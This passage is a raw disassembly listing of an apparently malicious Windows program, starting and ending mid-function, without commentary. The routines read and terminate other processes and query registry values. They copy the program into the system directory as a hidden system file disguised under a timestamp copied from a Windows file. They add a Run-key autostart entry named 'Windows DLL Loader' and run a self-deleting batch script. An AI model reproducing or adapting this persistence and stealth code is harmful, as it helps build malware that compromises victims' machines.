arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_4], 0
jz short loc_40651B
cmp [ebp+arg_C], 0
jnz short loc_406520
loc_40651B: ; CODE XREF: sub_406509+A�j
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406520: ; CODE XREF: sub_406509+10�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
push [ebp+arg_8]
call sub_40A8AD
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 180h
jbe short loc_406554
mov [ebp+var_4], 180h
loc_406554: ; CODE XREF: sub_406509+42�j
mov eax, [ebp+var_4]
inc eax
push eax
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_1C], eax
push [ebp+var_8]
push 0
push 10h
call dword_417094 ; OpenProcess
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_406586
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
jmp locret_406641
; ---------------------------------------------------------------------------
loc_406586: ; CODE XREF: sub_406509+6D�j
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
push [ebp+var_1C]
push [ebp+var_C]
push [ebp+var_18]
call dword_417098 ; ReadProcessMemory
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_40662F
cmp [ebp+var_14], 0
jz short loc_40662F
mov eax, [ebp+var_1C]
add eax, [ebp+var_4]
and byte ptr [eax], 0
and [ebp+var_20], 0
jmp short loc_4065C9
; ---------------------------------------------------------------------------
loc_4065C2: ; CODE XREF: sub_406509:loc_406620�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_4065C9: ; CODE XREF: sub_406509+B7�j
mov eax, [ebp+var_20]
cmp eax, [ebp+var_14]
jnb short loc_406622
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 16h
jz short loc_406617
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 10h
jg short loc_406620
loc_406617: ; CODE XREF: sub_406509+D4�j
; sub_406509+E2�j ...
mov eax, [ebp+var_1C]
add eax, [ebp+var_20]
mov byte ptr [eax], 2Eh
loc_406620: ; CODE XREF: sub_406509+10C�j
jmp short loc_4065C2
; ---------------------------------------------------------------------------
loc_406622: ; CODE XREF: sub_406509+C6�j
push [ebp+var_1C]
push [ebp+arg_0]
call sub_40D53F
pop ecx
pop ecx
loc_40662F: ; CODE XREF: sub_406509+9E�j
; sub_406509+A8�j
push [ebp+var_1C]
call sub_416B4C ; free
pop ecx
push [ebp+var_18]
call dword_4170A4 ; CloseHandle
locret_406641: ; CODE XREF: sub_406509:loc_40651B�j
; sub_406509+78�j
leave
retn
sub_406509 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406643 proc near ; CODE XREF: sub_40A9CF+3D7�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_406650
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406650: ; CODE XREF: sub_406643+9�j
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
call dword_4170E8 ; GetCurrentProcessId
cmp [ebp+var_4], eax
jnz short loc_406669
jmp short locret_40668D
; ---------------------------------------------------------------------------
loc_406669: ; CODE XREF: sub_406643+22�j
push [ebp+var_4]
push 0
push 1
call dword_417094 ; OpenProcess
mov [ebp+var_8], eax
push 0
push [ebp+var_8]
call dword_4170A0 ; TerminateProcess
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40668D: ; CODE XREF: sub_406643+B�j
; sub_406643+24�j
leave
retn
sub_406643 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40668F proc near ; CODE XREF: sub_403DF3+149�p
; sub_40A9CF+BD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_4066A0
; ---------------------------------------------------------------------------
loc_406699: ; CODE XREF: sub_40668F+2A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066A0: ; CODE XREF: sub_40668F+8�j
cmp [ebp+var_4], 8
jge short loc_4066BB
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_406699
; ---------------------------------------------------------------------------
loc_4066BB: ; CODE XREF: sub_40668F+15�j
mov eax, [ebp+arg_0]
and byte ptr [eax+8], 0
and [ebp+var_4], 0
jmp short loc_4066CF
; ---------------------------------------------------------------------------
loc_4066C8: ; CODE XREF: sub_40668F+59�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066CF: ; CODE XREF: sub_40668F+37�j
cmp [ebp+var_4], 6
jge short loc_4066EA
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066C8
; ---------------------------------------------------------------------------
loc_4066EA: ; CODE XREF: sub_40668F+44�j
mov eax, [ebp+arg_4]
and byte ptr [eax+6], 0
and [ebp+var_4], 0
jmp short loc_4066FE
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_40668F+88�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4066FE: ; CODE XREF: sub_40668F+66�j
cmp [ebp+var_4], 10h
jge short loc_406719
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_406719: ; CODE XREF: sub_40668F+73�j
mov eax, [ebp+arg_8]
and byte ptr [eax+10h], 0
leave
retn
sub_40668F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406722 proc near ; CODE XREF: sub_40A9CF+F40�p
var_424 = byte ptr -424h
var_420 = dword ptr -420h
var_41C = dword ptr -41Ch
var_418 = byte ptr -418h
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 424h
cmp [ebp+arg_4], 0
jnz short loc_406736
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406736: ; CODE XREF: sub_406722+D�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax+4]
cmp eax, 5Ch
jz short loc_406747
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406747: ; CODE XREF: sub_406722+1E�j
push 4
push offset aHkcr ; "HKCR"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_406769
mov [ebp+var_218], 80000000h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_406769: ; CODE XREF: sub_406722+39�j
push 4
push offset aHkcu ; "HKCU"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40678B
mov [ebp+var_218], 80000001h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406722+5B�j
push 4
push offset aHklm ; "HKLM"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067AD
mov [ebp+var_218], 80000002h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067AD: ; CODE XREF: sub_406722+7D�j
push 4
push offset aHkus ; "HKUS"
push [ebp+arg_4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_4067CF
mov [ebp+var_218], 80000003h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CF: ; CODE XREF: sub_406722+9F�j
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4067D4: ; CODE XREF: sub_406722+45�j
; sub_406722+67�j ...
mov eax, [ebp+arg_4]
add eax, 5
mov [ebp+arg_4], eax
push [ebp+arg_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_210], eax
jmp short loc_4067FB
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_406722:loc_406858�j
mov eax, [ebp+var_210]
dec eax
mov [ebp+var_210], eax
loc_4067FB: ; CODE XREF: sub_406722+CA�j
cmp [ebp+var_210], 0
jnz short loc_406809
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_406809: ; CODE XREF: sub_406722+E0�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_210]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406858
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
call sub_416B40 ; strlen
pop ecx
cmp eax, 200h
jb short loc_40683A
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40683A: ; CODE XREF: sub_406722+111�j
mov eax, [ebp+var_210]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+1]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40685A
; ---------------------------------------------------------------------------
loc_406858: ; CODE XREF: sub_406722+F6�j
jmp short loc_4067EE
; ---------------------------------------------------------------------------
loc_40685A: ; CODE XREF: sub_406722+134�j
cmp [ebp+var_210], 200h
jb short loc_40686B
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_40686B: ; CODE XREF: sub_406722+142�j
push [ebp+var_210]
push [ebp+arg_4]
lea eax, [ebp+var_418]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_210]
and [ebp+eax+var_418], 0
lea eax, [ebp+var_C]
push eax
push 1
push 0
lea eax, [ebp+var_418]
push eax
push [ebp+var_218]
call dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_4068B5
jmp locret_406A21
; ---------------------------------------------------------------------------
loc_4068B5: ; CODE XREF: sub_406722+18C�j
mov [ebp+var_8], 1000h
push [ebp+var_8]
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_214], eax
lea eax, [ebp+var_8]
push eax
push [ebp+var_214]
lea eax, [ebp+var_4]
push eax
push 0
lea eax, [ebp+var_20C]
push eax
push [ebp+var_C]
call dword_41700C ; RegQueryValueExA
test eax, eax
jnz loc_406A0C
cmp [ebp+var_4], 1
jz short loc_4068FF
cmp [ebp+var_4], 2
jnz short loc_406915
loc_4068FF: ; CODE XREF: sub_406722+1D5�j
push [ebp+var_214]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406915: ; CODE XREF: sub_406722+1DB�j
cmp [ebp+var_4], 4
jnz short loc_406933
mov eax, [ebp+var_214]
push dword ptr [eax]
push offset dword_418B5C
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
loc_406933: ; CODE XREF: sub_406722+1F7�j
cmp [ebp+var_4], 3
jnz loc_406A0C
push 180h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_420], eax
mov eax, [ebp+var_420]
and byte ptr [eax], 0
and [ebp+var_41C], 0
jmp short loc_40696D
; ---------------------------------------------------------------------------
loc_406960: ; CODE XREF: sub_406722+2C3�j
mov eax, [ebp+var_41C]
inc eax
mov [ebp+var_41C], eax
loc_40696D: ; CODE XREF: sub_406722+23C�j
mov eax, [ebp+var_41C]
cmp eax, [ebp+var_8]
jnb short loc_4069EA
mov eax, [ebp+var_214]
add eax, [ebp+var_41C]
movzx eax, byte ptr [eax]
push eax
push offset dword_418B54
lea eax, [ebp+var_424]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
push [ebp+var_420]
call sub_416B40 ; strlen
pop ecx
add eax, 3
cmp eax, 180h
jb short loc_4069D1
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
mov eax, [ebp+var_420]
and byte ptr [eax], 0
loc_4069D1: ; CODE XREF: sub_406722+28E�j
lea eax, [ebp+var_424]
push eax
push [ebp+var_420]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
jmp loc_406960
; ---------------------------------------------------------------------------
loc_4069EA: ; CODE XREF: sub_406722+254�j
push [ebp+var_420]
push offset dword_418B64
push [ebp+arg_0]
call sub_40D53F
add esp, 0Ch
push [ebp+var_420]
call sub_416B4C ; free
pop ecx
loc_406A0C: ; CODE XREF: sub_406722+1CB�j
; sub_406722+215�j
push [ebp+var_214]
call sub_416B4C ; free
pop ecx
push [ebp+var_C]
call dword_417028 ; RegCloseKey
locret_406A21: ; CODE XREF: sub_406722+F�j
; sub_406722+20�j ...
leave
retn
sub_406722 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A23 proc near ; CODE XREF: sub_40D043:loc_40D18D�p
; sub_40D871:loc_40DB71�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC0C
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_20C]
push eax
call dword_4170AC ; DeleteFileA
push offset dword_4182AC
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short locret_406AE5
push [ebp+var_108]
push 1
push 2
push offset dword_418DE0
call sub_416B7C ; fwrite
add esp, 10h
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
lea eax, [ebp+var_20C]
push eax
call sub_406B81
pop ecx
locret_406AE5: ; CODE XREF: sub_406A23+90�j
leave
retn
sub_406A23 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AE7 proc near ; CODE XREF: sub_40D043+13D�p
; sub_40D871+2F3�p
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
push 104h
lea eax, [ebp+var_20C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset dword_41DC0C
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_104]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
lea eax, [ebp+var_20C]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_108], eax
cmp [ebp+var_108], 0
jz short loc_406B7D
push [ebp+var_108]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_406B7F
; ---------------------------------------------------------------------------
loc_406B7D: ; CODE XREF: sub_406AE7+83�j
xor eax, eax
locret_406B7F: ; CODE XREF: sub_406AE7+94�j
leave
retn
sub_406AE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B81 proc near ; CODE XREF: sub_406A23+BC�p
; sub_406E8E+246�p
var_120 = dword ptr -120h
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push 104h
lea eax, [ebp+var_11C]
push eax
call dword_417040 ; GetWindowsDirectoryA
push offset dword_418DE8
lea eax, [ebp+var_11C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_417048 ; GetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
push 0
push 80h
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call dword_417044 ; CreateFileA
mov [ebp+var_120], eax
cmp [ebp+var_120], 0FFFFFFFFh
jz short locret_406C4F
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_120]
call dword_41704C ; SetFileTime
push [ebp+var_120]
call dword_4170A4 ; CloseHandle
locret_406C4F: ; CODE XREF: sub_406B81+5A�j
; sub_406B81+A8�j
leave
retn
sub_406B81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C51 proc near ; CODE XREF: sub_406E8E+133�p
; sub_406E8E+214�p ...
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 108h
push 0
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_417014 ; RegCreateKeyExA
cmp [ebp+arg_0], 0
jz short loc_406CE1
push 104h
lea eax, [ebp+var_108]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_108]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_108]
push eax
call dword_41703C ; lstrlen
inc eax
push eax
lea eax, [ebp+var_108]
push eax
push 1
push 0
push [ebp+arg_4]
push [ebp+var_4]
call dword_417010 ; RegSetValueExA
jmp short loc_406CED
; ---------------------------------------------------------------------------
loc_406CE1: ; CODE XREF: sub_406C51+30�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_417004 ; RegDeleteValueA
loc_406CED: ; CODE XREF: sub_406C51+8E�j
push [ebp+var_4]
call dword_417028 ; RegCloseKey
leave
retn
sub_406C51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406CF8 proc near ; CODE XREF: sub_406D47+2B�p
; sub_406E8E+253�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_C], eax
and [ebp+var_4], 0
jmp short loc_406D1D
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CF8:loc_406D40�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_406D1D: ; CODE XREF: sub_406CF8+1C�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_406D42
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 5Ch
jnz short loc_406D40
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+1]
mov [ebp+var_8], eax
loc_406D40: ; CODE XREF: sub_406CF8+39�j
jmp short loc_406D16
; ---------------------------------------------------------------------------
loc_406D42: ; CODE XREF: sub_406CF8+2B�j
mov eax, [ebp+var_8]
leave
retn
sub_406CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D47 proc near ; CODE XREF: sub_406E8E+9�p
; sub_407148+9�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push 104h
lea eax, [ebp+var_108]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
lea eax, [ebp+var_108]
push eax
call sub_406CF8
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and byte ptr [eax], 0
lea eax, [ebp+var_108]
push eax
call dword_417038 ; SetCurrentDirectoryA
leave
retn
sub_406D47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D90 proc near ; CODE XREF: sub_406E8E+25A�p
; sub_407148+168�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push 8
push 4
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_20], eax
and [ebp+var_1C], 0
loc_406DA8: ; CODE XREF: sub_406D90:loc_406DDF�j
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_1C]
mov [ebp+ecx+var_18], al
mov eax, [ebp+var_1C]
inc eax
mov [ebp+var_1C], eax
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_20]
jnz short loc_406DDF
push offset a_bat ; ".bat"
mov eax, [ebp+var_1C]
lea eax, [ebp+eax+var_18]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_406DE1
; ---------------------------------------------------------------------------
loc_406DDF: ; CODE XREF: sub_406D90+37�j
jmp short loc_406DA8
; ---------------------------------------------------------------------------
loc_406DE1: ; CODE XREF: sub_406D90+4D�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
push 400h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_24], eax
lea eax, [ebp+var_18]
push eax
call dword_4170AC ; DeleteFileA
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_18]
push eax
call dword_417044 ; CreateFileA
mov [ebp+var_28], eax
cmp [ebp+var_28], 0FFFFFFFFh
jnz short loc_406E2B
xor eax, eax
jmp short locret_406E8C
; ---------------------------------------------------------------------------
loc_406E2B: ; CODE XREF: sub_406D90+95�j
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
push [ebp+arg_0]
push [ebp+arg_0]
push offset a@echoOffDelete ; "@echo off\r\n:deleteagain\r\ndel /A:H /F %s"...
push [ebp+var_24]
call dword_4171E0 ; wsprintfA
add esp, 18h
and [ebp+var_4], 0
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+var_24]
call sub_416B40 ; strlen
pop ecx
push eax
push [ebp+var_24]
push [ebp+var_28]
call dword_417068 ; WriteFile
push [ebp+var_28]
call dword_4170A4 ; CloseHandle
push 0
push 0
push 0
lea eax, [ebp+var_18]
push eax
push offset aOpen ; "open"
push 0
call dword_4171D0
push 1
pop eax
locret_406E8C: ; CODE XREF: sub_406D90+99�j
leave
retn
sub_406D90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E8E proc near ; CODE XREF: sub_4167F1:loc_4169E1�p
var_368 = dword ptr -368h
var_338 = word ptr -338h
var_324 = byte ptr -324h
var_220 = dword ptr -220h
var_21C = byte ptr -21Ch
var_118 = byte ptr -118h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 368h
call sub_406D47
push 104h
lea eax, [ebp+var_324]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_14], 0
and [ebp+var_220], 0
jmp short loc_406ED1
; ---------------------------------------------------------------------------
loc_406EC4: ; CODE XREF: sub_406E8E:loc_406FF8�j
mov eax, [ebp+var_220]
inc eax
mov [ebp+var_220], eax
loc_406ED1: ; CODE XREF: sub_406E8E+34�j
mov eax, [ebp+var_220]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_406FFD
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_21C]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_21C]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_324]
push eax
lea eax, [ebp+var_21C]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_406FF8
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
push 1
call sub_406C51
add esp, 0Ch
mov eax, [ebp+var_220]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
mov eax, [ebp+var_220]
shl eax, 1
push off_418B8C[eax*4]
call sub_4105AD
pop ecx
jmp locret_407146
; ---------------------------------------------------------------------------
loc_406FF8: ; CODE XREF: sub_406E8E+E3�j
jmp loc_406EC4
; ---------------------------------------------------------------------------
loc_406FFD: ; CODE XREF: sub_406E8E+53�j
push [ebp+var_14]
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_14], eax
push 104h
lea eax, [ebp+var_118]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
lea eax, [ebp+var_118]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_14]
shl eax, 1
push off_418B88[eax*4]
call sub_4105AD
pop ecx
lea eax, [ebp+var_118]
push eax
call dword_4170AC ; DeleteFileA
loc_40707C: ; DATA XREF: .data:0041AD4C�o
; .data:0041AD60�o ...
push 0
lea eax, [ebp+var_118]
push eax
lea eax, [ebp+var_324]
push eax
call dword_417060 ; CopyFileA
test eax, eax
jnz short loc_4070AF
push offset dword_41EAFC
push offset aWindowsDllLoad ; "Windows DLL Loader"
push 1
call sub_406C51
add esp, 0Ch
jmp locret_407146
; ---------------------------------------------------------------------------
loc_4070AF: ; CODE XREF: sub_406E8E+206�j
push 4
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
push 2
lea eax, [ebp+var_118]
push eax
call dword_4170A8 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_406B81
pop ecx
lea eax, [ebp+var_324]
push eax
call sub_406CF8
pop ecx
push eax
call sub_406D90
pop ecx
push 44h
push 0
lea eax, [ebp+var_368]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_368], 44h
and [ebp+var_338], 0
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_368]
push eax
push 0
push 0
push 28h
push 1
push 0
push 0
lea eax, [ebp+var_118]
push eax
push 0
call dword_41707C ; CreateProcessA
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
locret_407146: ; CODE XREF: sub_406E8E+165�j
; sub_406E8E+21C�j
leave
retn
sub_406E8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407148 proc near ; CODE XREF: sub_402A32+7BB�p
; sub_40A9CF+145F�p ...
var_20C = byte ptr -20Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 20Ch
call sub_406D47
push 104h
lea eax, [ebp+var_20C]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
and [ebp+var_108], 0
jmp short loc_407187
; ---------------------------------------------------------------------------
loc_40717A: ; CODE XREF: sub_407148:loc_4072DB�j
mov eax, [ebp+var_108]
inc eax
mov [ebp+var_108], eax
loc_407187: ; CODE XREF: sub_407148+30�j
mov eax, [ebp+var_108]
shl eax, 1
cmp off_418B88[eax*4], 0
jz loc_4072E0
push 104h
lea eax, [ebp+var_104]
push eax
call dword_417050 ; GetSystemDirectoryA
push offset dword_418DE4
lea eax, [ebp+var_104]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
call sub_4105FB
pop ecx
mov eax, [ebp+var_108]
shl eax, 1
push off_418B88[eax*4]
